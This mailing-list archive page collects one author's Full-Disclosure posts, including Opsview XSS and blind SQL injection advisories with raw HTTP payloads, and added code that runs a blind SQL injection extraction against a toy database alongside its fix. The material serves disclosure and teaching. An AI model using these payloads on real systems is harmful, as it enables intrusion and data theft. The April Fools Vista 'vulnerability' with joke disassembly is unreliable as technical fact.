[Full-disclosure] Security is fun(ny) again

2014-01-09 Thread J. Oquendo

Dozens of hundreds of years ago, I used to seek out the best
of best regarding computer security. I sought them out to
read the material they wrote. This went from BBS text files,
to forums, IRC over to blog posts. Anything these folks may
have made, videos they may have uploaded with regards to
security, you name it. I did so because this is how I began
to learn computer security. Initially, I was intimidated by
security folks, but eventually I learned, many are not only
the smartest thinkers, but they're funny, they're cool, and
most of all they're human.

As time went on, I began contacting some of them, asking
them questions, secretly being mentored by their answers,
posts to mailing lists, and so forth. My digital rolodex
grew, as did my knowledge. As an individual, I have an
odd-ball sense of humor. Sort of dry, sort of dark. I then
began asking off the cuff questions in an interview format
to these peers. This all began circa 1997... And now it's
back to haunt my security peers since I became the most
awesomest, handsomest, and feared thirteen thirty sevener
since Thomas A. Anderson.

Without further rambling, an AntiOffline redux Top Ten
where security peers are asked the things that matter...
to me

For the redux launch, I hunted down Charlie Miller who
was likely hacking a car on a highway or something. I
managed to get his attention after a denial of service
mailbomb using a Win98 mailbomber app, till he had no choice
but to answer the questions, or face a million repeat msgs.

Top Ten with Charlie Miller
www.infiltrated.net/index.php?option=com_content&view=article&id=69


-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

Where ignorance is our master, there is no possibility of
real peace - Dalai Lama

42B0 5A53 6505 6638 44BB  3943 2BF7 D83F 210A 95AF
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x2BF7D83F210A95AF

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CVE-2013-5695 Multiple Cross Site Scripting (XSS) Attacks in Ops View

2013-10-29 Thread J. Oquendo
CVE-2013-5695 Multiple Cross Site Scripting (XSS) Attacks in Ops View
Affected version(s): Opsview prior to 4.4.1
Author: J. Oquendo (joquendo at e-fensive dot net)


I. ADVISORY

Title: Multiple Cross Site Scripting (XSS) Attacks in Ops View
Date published: 2013-10-28
Vendor contacted: 2013-09-04


II. BACKGROUND

Opsview is systems management software built on open
source software. To minimize noise, read more about it
here:

http://www.opsview.com/about-us


III. DESCRIPTION

Opsview reflects user-supplied input back into its pages without
output encoding in several places, allowing cross-site scripting:

/admin/auditlog
/info/host/
/login
/status/service/recheck
/viewport/

Each of these takes attacker-controlled input (a path segment, a
query parameter or a POST field) and echoes it into the response, so
a malicious user can craft a link or form that executes script in a
victim's browser in the context of the Opsview application.


IV. EXAMPLES

GET /admin/auditlog/?id=1%3cScRiPt%20%3eprompt%28ohnoes%29%3c%2fMY XSS SCRIPT HERE%3e HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]



GET /info/host/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]



POST /login HTTP/1.1
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

app=OPSVIEW&back=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22&login=Sign+in&login_password=no&login_username=no



POST /status/service/recheck HTTP/1.1
Content-Length: 144
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

from=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22&host_selection=opsview&service_selection=opsview%3bConnectivity%20-%20LAN&submit=Submit



GET /viewport/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

V. SOLUTION

Opsview fixed these issues in Opsview 4.4.1; upgrade to 4.4.1 or later.
http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

Where ignorance is our master, there is no possibility of
real peace - Dalai Lama

42B0 5A53 6505 6638 44BB  3943 2BF7 D83F 210A 95AF
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x2BF7D83F210A95AF

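
An added example (not part of the advisory, and not Opsview code) showing
what the three payload shapes in the advisory do when a template echoes
input raw, and why contextual output encoding closes all three at once.
The two render functions are stand-in templates written for this
illustration; the payloads are the advisory's, URL-decoded, with the
element payload's closing tag normalised to </ScRiPt>.

```python
"""Reflected XSS: the advisory's three payload shapes rendered by a
template that concatenates raw input, beside the same template with
contextual output encoding, plus a parser-based check for a breakout.

Added example; the render functions are stand-ins, not Opsview code.
"""
import html
from html.parser import HTMLParser

# The advisory's payloads, URL-decoded (closing tag normalised).
PAYLOADS = {
    "element":   "<ScRiPt >prompt(ohnoes)</ScRiPt>",              # /admin/auditlog?id=
    "attribute": '" onmouseover=prompt(ohnoes) xss="',            # back= / from=
    "css_expr":  "<div style=width:expression(prompt(ohnoes))>",  # /info/host/, /viewport/
}


def render_vulnerable(field: str, value: str) -> str:
    """Echoes the parameter into an element body and a quoted attribute
    without encoding, which is what the vulnerable responses amount to."""
    return (f"<p>Requested {field}: {value}</p>"
            f'<input type="hidden" name="{field}" value="{value}">')


def render_fixed(field: str, value: str) -> str:
    """Same template with html.escape(quote=True): & < > " ' become entity
    references, so input can neither open a tag nor end the attribute."""
    safe = html.escape(value, quote=True)
    return (f"<p>Requested {field}: {safe}</p>"
            f'<input type="hidden" name="{field}" value="{safe}">')


class BreakoutDetector(HTMLParser):
    """Records evidence that injected text changed the DOM structure:
    a script element, an on* event-handler attribute, or an IE-era
    CSS expression() inside a style attribute."""

    def __init__(self):
        super().__init__()
        self.findings = set()

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.add("script_element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.add("event_handler")
            if name == "style" and value and "expression(" in value.lower():
                self.findings.add("css_expression")


def injected_contexts(markup: str) -> set:
    """Parse the markup roughly as a browser would and return the set of
    breakouts found (empty set means the input stayed data)."""
    detector = BreakoutDetector()
    detector.feed(markup)
    detector.close()
    return detector.findings


if __name__ == "__main__":
    for kind, payload in PAYLOADS.items():
        print(kind,
              "vulnerable:", injected_contexts(render_vulnerable("back", payload)),
              "fixed:", injected_contexts(render_fixed("back", payload)))
```

The check parses the markup instead of grepping it. The encoded output
still contains the text " onmouseover=prompt(ohnoes)", but only as part
of one attribute's value, so a regex looking for " on...=" would report a
false positive where the parser correctly reports nothing.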


[Full-disclosure] CVE-2013-5694 Blind SQL Injection in Ops View

2013-10-29 Thread J. Oquendo
CVE-2013-5694 Blind SQL Injection in Ops View
Affected version(s): Opsview prior to 4.4.1
Author: J. Oquendo (joquendo at e-fensive dot net)


I. ADVISORY

Title: Blind SQL Injection in OpsView
Date published: 2013-10-28
Vendor contacted: 2013-09-04


II. BACKGROUND

Opsview is systems management software built on open
source software. To minimize noise, read more about it
here:

http://www.opsview.com/about-us


III. DESCRIPTION

A blind SQL injection vulnerability exists in the Opsview service
acknowledge function (/status/service/acknowledge). The
service_selection POST parameter is used in a database query without
sanitisation. Because the response does not display query results the
injection is blind, but a malicious user can still infer data one
condition at a time and, depending on the privileges of the database
account, dump the database, create users, or achieve code execution.

POST /status/service/acknowledge HTTP/1.1
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

comment=&from=http%3a%2f%2f10.20.30.68%2fstatus%2fhostgroup&notify=1&service_selection=%24%7dsql injection goes here%7d&submit=Submit

For more on BSQLI read about it here:

http://en.wikipedia.org/wiki/SQL_injection#Blind_SQL_injection


IV. SOLUTION

Opsview fixed this issue in Opsview 4.4.1; upgrade to 4.4.1 or later.
http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

Where ignorance is our master, there is no possibility of
real peace - Dalai Lama

42B0 5A53 6505 6638 44BB  3943 2BF7 D83F 210A 95AF
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x2BF7D83F210A95AF

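
The advisory leaves the injection itself as a placeholder. As an added
example (not part of the advisory, and not Opsview code), the block below
works a boolean-based blind injection through against a toy "acknowledge"
handler that interpolates service_selection into its query, and shows the
parameterised form that stops it. The schema, both handlers, the probe
shape and the in-memory SQLite database are assumptions constructed for
illustration; a real target's SQL dialect may need different comment or
string-function syntax.

```python
"""Boolean-based blind SQL injection worked through against a toy
"acknowledge" handler, with the parameterised fix alongside it.

Added example, not Opsview code: schema, handlers and payload shape are
assumptions constructed for illustration. SQLite keeps it offline.
"""
import sqlite3
import string

# Constructed in-memory database standing in for the monitoring DB.
DB = sqlite3.connect(":memory:")
DB.executescript(
    """
    CREATE TABLE services (id INTEGER PRIMARY KEY, name TEXT);
    CREATE TABLE contacts (id INTEGER PRIMARY KEY, name TEXT, password TEXT);
    INSERT INTO services VALUES (1, 'opsview;Connectivity - LAN');
    INSERT INTO contacts VALUES (1, 'admin', 's3cr3t');
    """
)


def acknowledge_vulnerable(service_selection: str) -> bool:
    """Builds SQL by string interpolation (the anti-pattern).

    The handler only reports whether the service exists, so it leaks one
    bit per request: exactly the oracle a blind injection needs."""
    sql = f"SELECT id FROM services WHERE name = '{service_selection}'"
    return DB.execute(sql).fetchone() is not None


def acknowledge_fixed(service_selection: str) -> bool:
    """Same lookup with a bound parameter: the input is data, never SQL."""
    sql = "SELECT id FROM services WHERE name = ?"
    return DB.execute(sql, (service_selection,)).fetchone() is not None


# Candidate characters; the single quote is left out so every probe stays
# well-formed (it could be recovered via unicode()/hex comparisons instead).
CHARSET = string.ascii_letters + string.digits + "_-.!@#$%^&*+=/ "


def probe(position: int, candidate: str, subquery: str) -> str:
    """Payload that makes the WHERE clause true iff the character at
    `position` (1-based) of the subquery's result equals `candidate`.
    The trailing '-- ' comments out the handler's closing quote."""
    return f"' OR substr(({subquery}),{position},1) = '{candidate}' -- "


def blind_extract(oracle, subquery: str, max_len: int = 64) -> str:
    """Recover a scalar subquery result one character at a time using only
    the oracle's True/False answer. Stops when no candidate matches."""
    recovered = ""
    for position in range(1, max_len + 1):
        for candidate in CHARSET:
            if oracle(probe(position, candidate, subquery)):
                recovered += candidate
                break
        else:
            break  # nothing matched: end of string (or a char outside CHARSET)
    return recovered


if __name__ == "__main__":
    target = "SELECT password FROM contacts WHERE name = 'admin'"
    print("vulnerable handler leaks:", blind_extract(acknowledge_vulnerable, target))
    print("fixed handler leaks:     ", repr(blind_extract(acknowledge_fixed, target)))
```

Each request leaks one bit (service found or not), so a six-character
value costs a few hundred requests; that is why a bug with no visible
query output is still a full data-disclosure issue, and why the fix is
binding the parameter rather than filtering the input.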


Re: [Full-disclosure] Gauss is out !

2012-08-09 Thread J. Oquendo
On 8/9/2012 9:43 AM, Peter Dawson wrote:

> Dubbed Gauss, the virus may also be capable of attacking critical
> infrastructure and was built in the same laboratories as Stuxnet, the
> computer worm widely believed to have been used by the United States
> and Israel to attack Iran's nuclear program, Kaspersky Lab said on
> Thursday.
>
> http://www.reuters.com/article/2012/08/09/net-us-cybersecurity-gauss-idUSBRE8780NJ20120809
>
> /pd


And it just took over Mars Rover Curiosity!
http://www.infiltrated.net/index.php?option=com_content&view=article&id=54

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

CCEC BDEE 74ED 0575 8104  7B90 B60D 6401 56CC DBEA
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xB60D640156CCDBEA



[Full-disclosure] Flame - couldn't resist

2012-06-15 Thread J. Oquendo

It's Friday and I couldn't resist. Someone needs to do a voiceover, a la
Direct TV, for AV companies:

When you use Windows, hackers target your machines.
When hackers target your machine, you get compromised and become part of
a botnet.
When you become part of a botnet, your machine attacks Iranian nuclear
facilities.
Don't let Windows attack nuclear facilities. Switch to McAfee.

http://www.youtube.com/watch?v=mcYWvvv75dM

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

CCEC BDEE 74ED 0575 8104  7B90 B60D 6401 56CC DBEA
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xB60D640156CCDBEA



[Full-disclosure] STEP Security

2012-04-01 Thread J. Oquendo
Interweb Re-Engineering Task Force   J. Oquendo
Request for Comments 4012012  E-Fensive Security Strategies
Category: Informational
Expires: 2020


   STEP by STEP Security


Status of this Memo

   This Internet-Draft is submitted in full nonconformance with
   provisions of BCP 78 and BCP 79. This document may not be modified,
   and derivative works of it may not be created, except to publish it
   as an RFC and to translate it into languages other than English.
   Internet-Drafts are working documents of the Internet Engineering
   Task Force (IETF), its areas, and its working groups.   Note that
   other groups may also distribute working documents as Internet-
   Drafts.

   Internet-Drafts are draft documents valid for a maximum of six
   months and may be updated, replaced, or obsoleted by other documents
   at any time.   It is inappropriate to use Internet-Drafts as
   reference material or to cite them other than as work in progress.

   The list of current Internet-Drafts can be accessed at
   http://www.ietf.org/ietf/1id-abstracts.txt

   The list of Internet-Draft Shadow Directories can be accessed at
   http://www.ietf.org/shadow.html

   This Internet-Draft will expire on April 01, 2020.

Copyright Notice

   Copyright (c) 2012 IETF Trust and the persons identified as the
   document authors. All rights reserved.

   This document is subject to BCP 78 and the IETF Trust's Legal
   Provisions Relating to IETF Documents
   (http://trustee.ietf.org/license-info) in effect on the date of
   publication of this document. Please review these documents
   carefully, as they describe your rights and restrictions with
   respect to this document. Code Components extracted from this
   document must include Simplified BSD License text as described in




Oquendo  Expires Apr 01, 2020  [Page 1]


Internet-Draft  Security Step by STEP   RFC 4012012


   Section 4.e of the Trust Legal Provisions and are provided without
   warranty as described in the Simplified BSD License.

Abstract

   This framework describes a practical methodology for ensuring
   security in otherwise insecure environments. The goal is to provide
   a rapid response mechanism to defend against the advanced persistent
   threats in the wild.

Table of Contents


   1.  Introduction..2
   2.  Conventions used in this document.4
   3.  Threats Explained.4
   3.1. Possible Actors..4
   4.  STEP Explained5
   5.  STEP in Action6
   6.  Security Considerations...7
   7.  IANA Considerations...7
   8.  Conclusions...8
   8.1. Informative References...8
   9.  Acknowledgments...8
   Appendix A.  Copyright9


1. Introduction
   In the network and computing industry, malicious actions,
   applications and actors have become more pervasive. Response times
   to anomalous events are burdening today's infrastructures and often
   strain resources. As networks under attack are often saturated with
   malicious traffic and advanced persistent threat actors engage in
   downloading terabytes of data, resources to combat these threats
   have diminished.

   Additionally, the threats are no longer just anonymized actors
   engaging in juvenile behavior, there are many instances of State
   Actors, disgruntled employees, contractors, third party vendors and
   criminal organizations. Each with separate agendas, each
   consistently targeting devices on the Internet.




Oquendo Informational  [Page 2]
Internet-Draft Security Step by STEP   RFC 4012012


   The intent behind this document is to define a methodology for rapid
   response to these threats. In this document, security will be
   achieved using a new methodology and protocol henceforth named
   Scissor To Ethernet Protocol (STEP).



   Initially designed as a last approach for security, STEP ensures
   that no attacker can disaffect any of the Confidentiality,
   Integrity, Availability of data as a whole.



   Many variables are involved in security, but the STEP methodology
   focuses on the following:


   o FUD (Fear Uncertainty and Doubt)
   o SCAM (Security Compliance and Management)
   o APT (Another Possible Threat)



   This methodology proposes STEP that SHOULD be performed at the onset
   of a cyber attack before more terabytes of data are exfiltrated from
   a network.

   1. Industry Standard IP

[Full-disclosure] Earth to Facebook

2012-03-15 Thread J. Oquendo
Earth calling Facebook security engineers, earth calling Facebook 
security engineers. Tried reaching out to you guys about a vulnerability 
a good friend discovered. No one should have to hunt you guys down in an 
effort to assist you with security flaws.


--
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

42B0 5A53 6505 6638 44BB  3943 2BF7 D83F 210A 95AF
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x2BF7D83F210A95AF



Re: [Full-disclosure] Android Noise Camera Application Released

2011-05-23 Thread J. Oquendo
On 5/23/2011 3:29 PM, SecurityXploded Group wrote:
> Hi all,
>
> Android Noise Camera is the FREE mobile application designed to help
> in remote monitoring by capturing the images whenever there is high
> level of noise around the mobile device.
> It automatically takes the pictures from your mobile's camera whenever
> the noise level in the area surrounding the phone exceeds the
> threshold limit. You can configure NoiseCamera to store the pictures
> in SD card as well as automatically email it to you.
>
> It is simple, easy to use Android application created by one of our
> contributor - JavaAngelo.


Now remember children, you must tweak this app prior to going to your
local rave, club, prom, etc. Otherwise kiss your SD storage sayonara.

-- 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

42B0 5A53 6505 6638 44BB  3943 2BF7 D83F 210A 95AF
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x2BF7D83F210A95AF



[Full-disclosure] Microsoft VISTA TCP/IP heap buffer underflow

2011-04-01 Thread J. Oquendo

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
Microsoft VISTA TCP/IP heap buffer underflow

Summary
-------
Microsoft Device IO Control wrapped by an API shipping with Windows
Vista 32 bit and 64 bit contains a possibly exploitable buffer
underflow corrupting kernel memory.


Affected Systems
----------------

Using the sample proof of concept, it was possible to verify this
issue on following operating systems and configurations:

* Microsoft Windows Vista Ultimate 32 bit

It is very likely that other versions of Windows Vista are affected by
this issue.

This issue did not occur on Windows XP, Windows 2003 Advanced Server,
Windows 2008 Server nor Windows Millennium Edition.

Re-installation of Service Pack 1 and/or upgrading to SP2 did not have
any effect in regards to resolving the random crashes.

To execute either the sample program or any other system command, the
user has to be either the admin, in the admin group or the
Administrators group.

Since this buffer underflow never makes it to kernel memory, it could
be possible that propping up the underflow will make it overflow and
take control over the operating system without any restriction.

Remedy
------
No remedy available at this time.

Reported
--------
This vulnerability is being reported now


Relevant
--------
934b7a5c 85aa6fe4  934b7ac4 837100ee
tcpip!IppCreateUnicastRoute+0xf0
934b7ae8 85a5d121 0001 858b6278 84d74ce8
tcpip!IppValidateSetAllRouteParameters+0x217
934b7b64 85a18a29 836c134c  92a84a70
tcpip!Ipv4SetAllRouteParameters+0x1d1
934b7ba4 8a844551 0001 92a326b4 
NETIO!NsiSetAllParametersEx+0xbd
934b7bf0 8a844eb8  836c1330 836c1378
nsiproxy!NsippSetAllParameters+0x1b1
934b7c14 8a844f91 92a32601  8371d290
nsiproxy!NsippDispatchDeviceControl+0x88
934b7c2c 818f0053 8590b448 92a32698 92a32698 nsiproxy!NsippDispatch+0x33
934b7c44 81a80515 8371d290 92a32698 92a32708 nt!IofCallDriver+0x63
934b7c64 81a80cba 8590b448 8371d290 0027f700
nt!IopSynchronousServiceTail+0x1d9
934b7d00 81a6a98e 8590b448 92a32698  nt!IopXxxControlFile+0x6b7
934b7d34 8188ba7a 0044 0048  nt!NtDeviceIoControlFile+0x2a
934b7d34 77529a94 0044 0048  nt!KiFastCallEntry+0x12a
0027f68c 77528444 777214b9 0044 0048 ntdll!KiFastSystemCallRet
0027f690 777214b9 0044 0048 
ntdll!ZwDeviceIoControlFile+0xc

 Disassembly with commands 

mov edi,edi
push ebp
mov ebp,esp
push edi
mov edi,dword ptr [ebp+8]
lea eax,[ebp+8]
push eax
push dword ptr [edi+4]
push 18h
call NOMNOM!RtlULongAdd (85a1675d)
test eax,eax
jl OMNOM!PtpCreateNOM+0x1b
push esi
push 74704D4Eh
push dword ptr [ebp+8] ; = 0x0020
push 0
call ExAllocatePoolWithTag ; eax = ExAllocatePoolWithTag(0, 0x20,
0x74704D4E, esi);
mov esi,eax ; = 0x83716380 allocated buffer address
test esi,esi
je NOM!CreateOMNOM+0x6d
push dword ptr [ebp+8] ; = 0x0020
push 0
push esi ; 0x83716380 allocated buffer address
call NOM!memset (85a10543) ; memset((char*)0x83716380, 0, 0x20)
mov eax,dword ptr [ebp+14h]
mov dword ptr [esi],eax
mov eax,dword ptr [ebp+18h]
mov dword ptr [esi+0Ch],eax
mov dword ptr [eax],esi
mov eax,dword ptr [ebp+0Ch]
and word ptr [esi+14h],0
add esp,0Ch
push eax ; = 0x837100ee
lea eax,[esi+18h] ; esi unchanged, holds the alloc. buffer address
(=0x83716380)
push eax ; = 0x83716398 add offset of 0x18 bytes to the allocated buffer
inc dword ptr [edi+8]
mov eax,esi
pop esi
pop edi
pop ebp
ret 14h
nop
nop
nop
om
nom
nom


-- 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

42B0 5A53 6505 6638 44BB  3943 2BF7 D83F 210A 95AF
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x2BF7D83F210A95AF
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
 
iD8DBQFNlhDEK/fYPyEKla8RAnWXAJ0XaB/D0Cd0eYt+6Vd00Tx6RYsRmQCfWwGk
QGt6mpCUiDKXxhCdg5xpi7M=
=pjws
-END PGP SIGNATURE-



Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC

2010-12-16 Thread J. Oquendo

I can only speculate the following with regards to Perry coming out
of the blue with this news and it obviously means nothing as I'm not
a profiler, psychologist, etc. and even if I were, who cares at the
end of the day.

There is probably some form of credibility to perhaps the government
wanting to backdoor OpenBSD or any other operating system but that
obviously does not mean this occurred.

What I think about his disclosure is, Perry sought to make something
known to Theo which took Theo by surprise, and Theo, being who he is,
disclosed it to the public. The following strike me as odd though:

I have never seen Theo come out of the blue publicly for something
non-BSD related. He never struck me as the type to put his business
out there, especially in a case like this.

My thoughts are: If he DID know something, why would he PUBLICLY out
himself like that? It would have made more sense for him to keep
that conversation private and lie enough to get this Perry guy
to hush/think about things differently, etc.

I think if it were me, I would have done the same had I no
knowledge. Had I knowledge, my first thought would be: by publicly
disclosing anything, the people I report(ed) to will be pissed and
it'll kick up a firestorm (this is for those who speculate Theo
had something to do with this).

So I think, what does this Perry guy have against the others? Are
there any documented exchanges or disagreements between Perry,
Wright or Lowe? For someone to come out of the blue and name names 10
years later makes little sense. It must have been a hell of a bone
to grind to wait 10 years, once an NDA has expired, to out someone.
For that, an anonymous email to a mailing list would have sufficed
as opposed to waiting 10 years.

I then think, wait a minute, something like this (backdooring
anything) must go beyond a 10 year NDA. Even if it didn't, the
potential blowback Perry could face would be so enormous, it would
not only be insane to come out of the woodworks, but likely career
suicide as well. The 'bone to pick' doesn't sound realistic. After
all, he could have submitted an anonymous email years ago to
air his dirt.

What I believe happened is an iteration of rumors. Perhaps there
came a time when an agency in government wanted to place backdoors,
maybe even approached BSD developers [1]. Did it fly? Only three
people would completely know at the end of the day: Perry, Scott
Lowe (whomever he is) Jason Wright.

"Would you like to help the government... We need you to ..." which
after time became "the government placed a backdoor". Ten years is
an awful long time to sit around with whiffs of news like this. I
doubt a secret like that could have been kept secret for 10 long
years. At the same time though, I doubt there is reason for Perry
to outright make this up. I think maybe he heard a rumor and
rolled with it.

I've re-read Perry's email to Theo and another response. His
initial e-mail didn't impose a sense of "payback is a bitch"
but more of a "I think you should know", so for those claiming he
wanted to get back at Theo, you may be oblivious to the fact that
he sent the email to Theo in private, not to a mailing list. That
debunks any notion to me that he was trying to hurt Theo. He
would have had to have known 100% that Theo would disclose the
email. So the point of him coming out of the closet to hurt Theo
is weak and moot if you ask me.

As for the credibility of a former agent saying "we tried, it
didn't work", that sounds fishy as well. I don't know about anyone else
but I can't imagine him admitting to anything: "sure we backdoored
it". That wouldn't make any sense and would likely make him a few
enemies both on and off that agency.

At the end of the day though, I honestly couldn't care less if
they backdoored my VPN. They'd be mighty bored wondering why
terminals are always tail -f'ing, and how the hell I manage to
type so much without shutting up ;)


[1] https://twitter.com/ejhilbert/status/14891845825863680


-- 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

227C 5D35 7DCB 0893 95AA  4771 1DCE 1FD1 5CCD 6B5E
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x5CCD6B5E



Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC

2010-12-15 Thread J. Oquendo
On 12/15/2010 1:55 PM, bk wrote:
> On Dec 15, 2010, at 10:32 AM, Paul Schmehl wrote:
>
>> --On December 14, 2010 8:40:14 PM -0500 b...@fbi.dhs.org wrote:
>>> http://www.downspout.org/?q=node/3
>>>
>>> Seems IPSEC might have a back door written into it by the FBI?
>>
>> So for 10 years IPSEC has had a backdoor in it and not one person examining
>> the code has noticed it? <snip>
>>
>> Read The Cathedral and The Bazaar.
>>
>> --
>> Paul Schmehl, Senior Infosec Analyst
>
> I call bullshit on all the people claiming this couldn't possibly have
> existed because anyone can read the source.  How many of you understand
> crypto.  OK, now how many of you _actually_ understand crypto?  And of those,
> how many look at *BSD?
>
> There have been plenty of recent examples of Open Source projects that have
> had undetected security flaws for multiple years.  It's not difficult to
> believe a relatively uncommon OS could have a subtle weakness in a
> difficult-to-understand part of the code.
>
> In this particular case, it looks to be total FUD by some lunatic with an axe
> to grind, but we shouldn't be so arrogant to assume that such a flaw _could
> not_ exist.
>
> BTW I actually use OpenBSD on many of my systems and I happen to think it's a
> very simple and practical OS, but I'm not blind to potential problems.
>
> --
> chort

2cents

I take the Devil's Advocate approach here: We assume all the code in
OpenBSD is audited, for one. Secondly, I quote Juvenal: "Quis custodiet
ipsos custodes?" Who is to say the person auditing the code wasn't the
one who backdoored the code, this assuming there is or was a backdoor.
Thirdly, by Theo coming clean and offering disclosure to the public,
it could remove the potential of being exposed via pre-emptive strike.
If he stays shut and is exposed further down the road, it leads to more
questioning. Again, this is assuming that 1) there is a backdoor 2) Theo
somehow knew.

Furthermore, to think along the lines of "So for 10 years IPSEC has had
a backdoor in it and not one person examining the code has noticed it",
I too concur with the fact that crypto is a very specific and
specialized area which many would not have the capabilities to audit.
Because open source projects like OpenBSD are built around trust, there
is no way to validate who is working on what. What does one propose in
an area like an OpenBSD project? Background checks for all their
developers? This would not solve the problem.

I personally don't believe, based on Theo's demeanor and approach to
security, that he would have allowed this let alone KNOWN that it
occurred. However, the reality is, who is watching the watchers?

/2cents

-- 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

227C 5D35 7DCB 0893 95AA  4771 1DCE 1FD1 5CCD 6B5E
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x5CCD6B5E


Re: [Full-disclosure] WikiLeaks

2010-10-08 Thread J. Oquendo
Harry Behrens wrote:

> If you don't understand why something like Wikileaks being down with no
> obvious reason or explanation is an issue - then I guess continue
> sleeping...
> And it is indeed a security issue - in fact of international proportions..

Oh please. The world does not stop for Wikileaks going down in fact, I
guarantee you that in over 90% of the places you will visit this week,
no one will know or even care that Wikileaks is down.

Security issue of international proportions my ass. Life goes on,
people go on, no government, agency, official, business nor individual
stopped functioning, living, breathing because Wikileaks went down.

Reality is, outside of a very small segment of individuals, no one
cares to be quite frank. To prove this point, ask the next 10 people you
see: "Do you know Wikileaks is down!?" and study their response. Wanna
bet 99% will respond something similar to one of the following:

So?
What's Wikileaks?
Why would Wikipedia be down?
Who cares
What do they do?
Why should I care
And this has what to do with me?


-- 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT

It takes 20 years to build a reputation and five minutes to
ruin it. If you think about that, you'll do things
differently. - Warren Buffett

227C 5D35 7DCB 0893 95AA  4771 1DCE 1FD1 5CCD 6B5E
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x5CCD6B5E



Re: [Full-disclosure] WikiLeaks

